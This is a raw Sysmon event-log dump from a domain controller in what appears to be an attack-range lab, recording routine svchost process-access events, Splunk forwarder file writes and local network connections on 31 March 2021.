10341000x800000000000000011457Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:44.481{266CAFBE-646C-6064-1000-00000000AE01}11246856C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2a2f2|C:\Windows\system32\wbem\wmiprvsd.dll+29e26|C:\Windows\system32\wbem\wmiprvsd.dll+28432|C:\Windows\system32\wbem\wmiprvsd.dll+57817|C:\Windows\system32\wbem\wmiprvsd.dll+8a475|C:\Windows\system32\wbem\wbemcore.dll+bcb3|C:\Windows\system32\wbem\wbemcore.dll+3393|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+2c9be|C:\Windows\system32\wbem\wbemcore.dll+202d8|C:\Windows\system32\wbem\wbemcore.dll+390e|C:\Windows\system32\wbem\wbemcore.dll+22bba|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011456Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:44.481{266CAFBE-646C-6064-1000-00000000AE01}11246856C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2597b|C:\Windows\system32\wbem\wmiprvsd.dll+283dc|C:\Windows\system32\wbem\wmiprvsd.dll+57817|C:\Windows\system32\wbem\wmiprvsd.dll+8a475|C:\Windows\system32\wbem\wbemcore.dll+bcb3|C:\Windows\system32\wbem\wbemcore.dll+3393|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+2c9be|C:\Windows\system32\wbem\wbemcore.dll+202d8|C:\Windows\system32\wbem\wbemcore.dll+390e|C:\Windows\system32\wbem\wbemcore.dll+22bba|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 11241100x800000000000000011455Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:44.481{266CAFBE-646C-6064-1100-00000000AE01}1200C:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.dat2021-03-31 12:00:44.752 23542300x800000000000000011454Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:44.481{266CAFBE-646C-6064-1100-00000000AE01}1200NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=3012B9B1FBC6FCBEC0ED8909DDEDD40A,SHA256=9EC0603A62C82F9D09F640305118099A6469C2BC0EECCF9AD3EF85105784BD59,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000011453Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:43.007{266CAFBE-6467-6064-0100-00000000AE01}4SystemNT 
AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53728-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local445microsoft-ds 354300x800000000000000011452Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:43.007{266CAFBE-6467-6064-0100-00000000AE01}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53728-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local445microsoft-ds 354300x800000000000000011451Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:42.646{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53727-false10.0.1.12-8000- 23542300x800000000000000011462Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:45.918{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=939CC125D46A65DB8D5B337E364D7A05,SHA256=22FE59F5EEEEFD611E4558BDB974257D0FEE18C030AA0A38C32BAE6412377F09,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000011461Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:45.699{266CAFBE-646C-6064-0D00-00000000AE01}6126772C:\Windows\system32\svchost.exe{266CAFBE-64C4-6064-9D00-00000000AE01}5112C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x800000000000000011460Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:45.699{266CAFBE-646C-6064-0D00-00000000AE01}6126772C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x800000000000000011463Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:46.965{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A33127CD314A5D5EA0744047444F5117,SHA256=C2F50900D72D65B2AA5AAAC1D82BF654973A4221452ACEF249B4CE93B7E1FB4D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011464Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:47.980{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA2920C60F93B15C508DF4659F585F06,SHA256=A9842630FF7F9BB22DF5655C3749D8E0A62C44F2201FA022BE67F053B28C94CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011465Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:48.965{266CAFBE-64ED-6064-D500-00000000AE01}5648NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program 
Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=B35B78CAB02E2DF96E6298AED402CCE2,SHA256=ABF9EEBE445FCAD2912EDB5BD53AB1DE5E78CFB0B4162908801B10E8CC745B21,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000011467Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:48.568{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53729-false10.0.1.12-8000- 23542300x800000000000000011466Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:49.058{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=45C3055FC25276EBD22B0A733EF80376,SHA256=C60B89E7FB50FD6C37713D68BB35E6989059B3A4186072FB90BAFB37075DF54B,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000011493Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:49.365{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53730-false10.0.1.12-8089- 10341000x800000000000000011492Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:50.371{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011491Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:50.371{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011490Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:50.371{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011489Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:50.371{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011488Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:50.371{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011487Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:50.371{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011486Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:50.371{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011485Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:50.371{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011484Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:50.371{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011483Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:50.371{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011482Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:50.371{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011481Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:50.371{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011480Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:50.371{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011479Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:50.371{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011478Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:50.371{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011477Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:50.371{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011476Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:50.371{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011475Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:50.371{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011474Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:50.371{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011473Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:50.371{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011472Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:50.371{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011471Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 